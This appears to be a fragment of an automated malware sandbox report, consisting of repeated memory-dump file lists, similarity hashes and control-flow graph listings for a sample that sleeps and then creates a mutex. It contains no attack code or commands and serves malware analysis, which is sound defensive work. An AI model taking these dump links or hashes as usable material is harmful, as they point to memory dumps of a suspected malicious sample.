                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                • Opcode ID: 5d73be259df7046a4aace25825c15f79276d742113f726c1216eb9025b58bd1d
                                                                                                                                                                                                                                • Instruction ID: 8a4fd89fa6a4ceddff799d7099ede5d15e47b01702f55a0163e8017e47a6ca77
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d73be259df7046a4aace25825c15f79276d742113f726c1216eb9025b58bd1d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8313B31B001409BEB08ABBCD8897AFB762EFC3316F204719E4149B3D6D7B599848763

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 383 5a54d-5a56d 387 5a56f-5a57b 383->387 388 5a59b-5a5b7 383->388 389 5a591-5a598 call 6d663 387->389 390 5a57d-5a58b 387->390 391 5a5e5-5a604 388->391 392 5a5b9-5a5c5 388->392 389->388 390->389 397 5a944-5a949 call 86c6a 390->397 395 5a606-5a612 391->395 396 5a632-5a916 call 680c0 391->396 393 5a5c7-5a5d5 392->393 394 5a5db-5a5e2 call 6d663 392->394 393->394 393->397 394->391 400 5a614-5a622 395->400 401 5a628-5a62f call 6d663 395->401 411 5a94e-5a994 call 86c6a Sleep CreateMutexA 397->411 412 5a949 call 86c6a 397->412 400->397 400->401 401->396 417 5a9a7-5a9a8 411->417 418 5a996-5a998 411->418 412->411 418->417 419 5a99a-5a9a5 418->419 419->417
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 0005A963
                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                • Opcode ID: ae835cc3c57642841cce1dbd1fc8c3cc47aca87bf3b9e60e5cd5664408b24086
                                                                                                                                                                                                                                • Instruction ID: 4a5429ee0b7472948e3284689b394d1f26a184f082a811b1803209cb1d8e3a7d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae835cc3c57642841cce1dbd1fc8c3cc47aca87bf3b9e60e5cd5664408b24086
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58312C317001448BEB08DB78DC89BAFB762EB87316F244718E814DB3D5D77599848753

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 421 5a682-5a6a2 425 5a6a4-5a6b0 421->425 426 5a6d0-5a6ec 421->426 427 5a6c6-5a6cd call 6d663 425->427 428 5a6b2-5a6c0 425->428 429 5a6ee-5a6fa 426->429 430 5a71a-5a739 426->430 427->426 428->427 431 5a949 428->431 433 5a710-5a717 call 6d663 429->433 434 5a6fc-5a70a 429->434 435 5a767-5a916 call 680c0 430->435 436 5a73b-5a747 430->436 440 5a94e-5a994 call 86c6a Sleep CreateMutexA 431->440 441 5a949 call 86c6a 431->441 433->430 434->431 434->433 442 5a75d-5a764 call 6d663 436->442 443 5a749-5a757 436->443 453 5a9a7-5a9a8 440->453 454 5a996-5a998 440->454 441->440 442->435 443->431 443->442 454->453 455 5a99a-5a9a5 454->455 455->453
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 0005A963
                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                • Opcode ID: 8a5c3f32aa8c48c8895f1c41d2d79f6a778b9cf28f8bbceb2b0d78dc47ba9a34
                                                                                                                                                                                                                                • Instruction ID: 6bd0d905bea542da8b761df657b334457bbc98fd7632d36029016176b1ae907d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8a5c3f32aa8c48c8895f1c41d2d79f6a778b9cf28f8bbceb2b0d78dc47ba9a34
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A312831B042448BEB08DB78DC897AFB7A2EB87312F248718E814DB3D5C77599848763

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 457 59adc-59ae8 458 59afe-59d91 call 6d663 call 67a00 call 55c10 call 58b30 call 68220 call 67a00 call 55c10 call 58b30 call 68220 457->458 459 59aea-59af8 457->459 459->458 460 5a917 459->460 462 5a953-5a994 Sleep CreateMutexA 460->462 463 5a917 call 86c6a 460->463 468 5a9a7-5a9a8 462->468 469 5a996-5a998 462->469 463->462 469->468 471 5a99a-5a9a5 469->471 471->468
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 0005A963
                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                • Opcode ID: c7ddcf1e5cfb1dbbdd10ad7c8595dd13bee10e23ba172cf25831762562caa45c
                                                                                                                                                                                                                                • Instruction ID: e4fa8ca813f1d6d97d64dde43676f85f22b84f10fe28fc289e457673c77f05f5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7ddcf1e5cfb1dbbdd10ad7c8595dd13bee10e23ba172cf25831762562caa45c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7214931704240DBFB189B6CEC8976EB7A6EBC2312F204719E818CB3D5DB75A9848752

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 525 5a856-5a86e 526 5a870-5a87c 525->526 527 5a89c-5a89e 525->527 528 5a892-5a899 call 6d663 526->528 529 5a87e-5a88c 526->529 530 5a8a0-5a8a7 527->530 531 5a8a9-5a8b1 call 57d30 527->531 528->527 529->528 533 5a94e-5a987 call 86c6a Sleep CreateMutexA 529->533 535 5a8eb-5a916 call 680c0 530->535 540 5a8e4-5a8e6 531->540 541 5a8b3-5a8bb call 57d30 531->541 546 5a98e-5a994 533->546 540->535 541->540 547 5a8bd-5a8c5 call 57d30 541->547 548 5a9a7-5a9a8 546->548 549 5a996-5a998 546->549 547->540 553 5a8c7-5a8cf call 57d30 547->553 549->548 551 5a99a-5a9a5 549->551 551->548 553->540 557 5a8d1-5a8d9 call 57d30 553->557 557->540 560 5a8db-5a8e2 557->560 560->535
                                                                                                                                                                                                                                APIs
